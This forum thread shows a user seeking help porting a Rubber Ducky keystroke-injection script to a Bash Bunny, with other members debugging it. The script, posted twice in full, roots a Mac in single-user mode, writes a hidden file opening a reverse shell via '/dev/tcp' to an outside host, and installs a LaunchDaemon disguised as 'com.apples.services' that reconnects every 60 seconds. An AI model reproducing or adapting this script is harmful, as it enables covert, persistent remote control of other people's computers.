Jump to content

Recommended Posts

Posted

Can someone please explain how you use Ducky code txt to Bash Bunny

Step by step would be appreciated

 

Thanks

Posted

example

How would i get this to work on BashBunny

REM Patrick Mosca
REM A simple script for rooting OSX from single user mode.
REM Change mysite.com to your domain name or IP address
REM Change 1337 to your port number
REM Catch the shell with 'nc -l -p 1337'
REM http://patrickmosca.com/root-a-mac-in-10-seconds-or-less/
DELAY 1000
STRING mount -uw /
ENTER
DELAY 2000
STRING mkdir /Library/.hidden
ENTER
DELAY 200
STRING echo '#!/bin/bash
ENTER
STRING bash -i >& /dev/tcp/mysite.com/1337 0>&1
ENTER
STRING wait' > /Library/.hidden/connect.sh
ENTER
DELAY 500
STRING chmod +x /Library/.hidden/connect.sh
ENTER
DELAY 200
STRING mkdir /Library/LaunchDaemons
ENTER
DELAY 200
STRING echo '<plist version="1.0">
ENTER
STRING <dict>
ENTER
STRING <key>Label</key>
ENTER
STRING <string>com.apples.services</string>
ENTER
STRING <key>ProgramArguments</key>
ENTER
STRING <array>
ENTER
STRING <string>/bin/sh</string>
ENTER
STRING <string>/Library/.hidden/connect.sh</string>
ENTER
STRING </array>
ENTER
STRING <key>RunAtLoad</key>
ENTER
STRING <true/>
ENTER
STRING <key>StartInterval</key>
ENTER
STRING <integer>60</integer>
ENTER
STRING <key>AbandonProcessGroup</key>
ENTER
STRING <true/>
ENTER
STRING </dict>
ENTER
STRING </plist>' > /Library/LaunchDaemons/com.apples.services.plist
ENTER
DELAY 500
STRING chmod 600 /Library/LaunchDaemons/com.apples.services.plist
ENTER
DELAY 200
STRING launchctl load /Library/LaunchDaemons/com.apples.services.plist
ENTER
DELAY 1000
STRING shutdown -h now
ENTER
Posted

Hey buddy

Thanks for your reply 

I've looked but still cant get it to work 

Can you PLEASE give example

 

Thank you 

Posted

Easiest way both for maintenance as well as for actual use is to put your script as is into a file.  Say ducky.txt.  Then do:
QUACK ducky.txt

Otherwise, if you want it inline, just put QUACK in front of each line.

  • Upvote 1
Posted

Did this and still dont work

Any Ideas guys please

what am i missing ????

 

#!/bin/bash
LED R
ATTACKMODE HID 
LED R G 
QUACK DELAY 1000
QUACK STRING mount -uw /
QUACK ENTER
QUACK DELAY 2000
QUACK STRING mkdir /Library/.hidden
QUACK ENTER
QUACK DELAY 200
QUACK STRING echo '#!/bin/bash
QUACK ENTER
QUACK STRING bash -i >& /dev/tcp/192.168.1.55/4444 0>&1
QUACK ENTER
QUACK STRING wait' > /Library/.hidden/connect.sh
QUACK ENTER
QUACK DELAY 500
QUACK STRING chmod +x /Library/.hidden/connect.sh
QUACK ENTER
QUACK DELAY 200
QUACK STRING mkdir /Library/LaunchDaemons
QUACK ENTER
QUACK DELAY 200
QUACK STRING echo '<plist version="1.0">
QUACK ENTER
QUACK STRING <dict>
QUACK ENTER
QUACK STRING <key>Label</key>
QUACK ENTER
QUACK STRING <string>com.apples.services</string>
QUACK ENTER
QUACK STRING <key>ProgramArguments</key>
QUACK ENTER
QUACK STRING <array>
QUACK ENTER
QUACK STRING <string>/bin/sh</string>
QUACK ENTER
QUACK STRING <string>/Library/.hidden/connect.sh</string>
QUACK ENTER
QUACK STRING </array>
QUACK ENTER
QUACK STRING <key>RunAtLoad</key>
QUACK ENTER
QUACK STRING <true/>
QUACK ENTER
QUACK STRING <key>StartInterval</key>
QUACK ENTER
QUACK STRING <integer>60</integer>
QUACK ENTER
QUACK STRING <key>AbandonProcessGroup</key>
QUACK ENTER
QUACK STRING <true/>
QUACK ENTER
QUACK STRING </dict>
QUACK ENTER
QUACK STRING </plist>' > /Library/LaunchDaemons/com.apples.services.plist
QUACK ENTER
QUACK DELAY 500
QUACK STRING chmod 600 /Library/LaunchDaemons/com.apples.services.plist
QUACK ENTER
QUACK DELAY 200
QUACK STRING launchctl load /Library/LaunchDaemons/com.apples.services.plist
QUACK ENTER
QUACK DELAY 1000
QUACK STRING shutdown -h now
QUACK ENTER

LED R
 

Posted

it works with rubber ducky but cant get it to run on the Bashbunny

The light goes red and green but no keystrokes 

Posted
41 minutes ago, valentino00776 said:

it works with rubber ducky but cant get it to run on the Bashbunny

The light goes red and green but no keystrokes 

@valentino00776

This answers my question 1... What about answering question 2?

Posted

Ive tried nscan payload and that works

Im so sorry GermanNood , whats duckyinstall payload ?

Sorry for my lack of knowledge

Even got a wifi nano never used for 9 months lol

Posted
11 minutes ago, valentino00776 said:

 

Ive tried nscan payload and that works

 

I don't know that payload... Where did you get it from? Or did you mean nmapper? Most probably the payload you tested doesn't use the QUAK command...

12 minutes ago, valentino00776 said:

Im so sorry GermanNood , whats duckyinstall payload ?

As you don't know it I assume you haven't installed it and therefore it is most probably the reason why QUAK doesn't work...

Copy the duckyinstall payload from library to one of the switches and run it. After it succeeded test again your original script...

Posted

Yes sorry nmapper

I try you suggestion and let you know

Really appreciate your time and help buddy  

Posted

just looking at the payload

Do i need to unzip it and run it somewhere (on a different pc )?

what di i actually install and how 

I know getting embarrassing to ask

Posted

Hey illwill thanks

But what do you mean ????

can you show me an example or use what ive posted to show me ??

Thank you

Posted
19 minutes ago, valentino00776 said:

just looking at the payload

Do i need to unzip it and run it somewhere (on a different pc )?

what di i actually install and how 

I know getting embarrassing to ask

You don't have to unzip anything... just move everything to the switch folder and go for it. 

What you are going to install? Just read the readme.txt!

Quote

DuckToolkit installer for Bash Bunny. 
Adds support for new languages. and uses the Ducktoolkit python library for encoding. 

Version 1.0.0

Moves the libary files to /tools
Update Q and QUACK to point to the new library
Writes error to /root/ducky.log

Purple Blinking.................Moving tools
Purple Solid....................Tools moved
Amber Blinking..................Setup tools
Red Solid.......................Tool installation failed
White Solid.....................Installation completed successfully

 

Posted

Ok so i copied duckyinstall on switch 1 , plugged it in and it has a install log saying installed.

I then copied my payload .txt to switch 2 and tried it with the quake commands on every line but still nothing.

My hair is going grey LOL

Posted

Install log

 

Install Log:
----------------
Found /root/udisk/payloads/switch1/DuckToolkit-1.0.1.tar.gz
Copying files to target dir
Move Complete
Update Q
Update QUACK
 

Posted (edited)

just to be sure: is it named "payload .txt" or "payload.txt"?

And please try a simple "hello world" payload... In your script I'm missing opening a terminal or similar... 

And post that script also...

Edited by GermanNoob
Posted

This worked 

 

#!/bin/bash

ATTACKMODE HID 
LED R G 


QUACK DELAY 3000
QUACK GUI r
QUACK DELAY 500
QUACK STRING notepad
QUACK DELAY 500
QUACK ENTER
QUACK DELAY 750
QUACK STRING Hello World!!!
QUACK ENTER

Posted

the original script is done on a mac in single user mode which terminal is already open 

it just wont type any of the  commands.

runs great with Rubber Ducky

Posted

Congratulations!

So now its only something about your script...

4 hours ago, valentino00776 said:

#!/bin/bash
LED R
ATTACKMODE HID 
LED R G 
QUACK DELAY 1000
QUACK STRING mount -uw /
QUACK ENTER

You simply begin to quack commands without having opened a terminal or anything to write in...

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...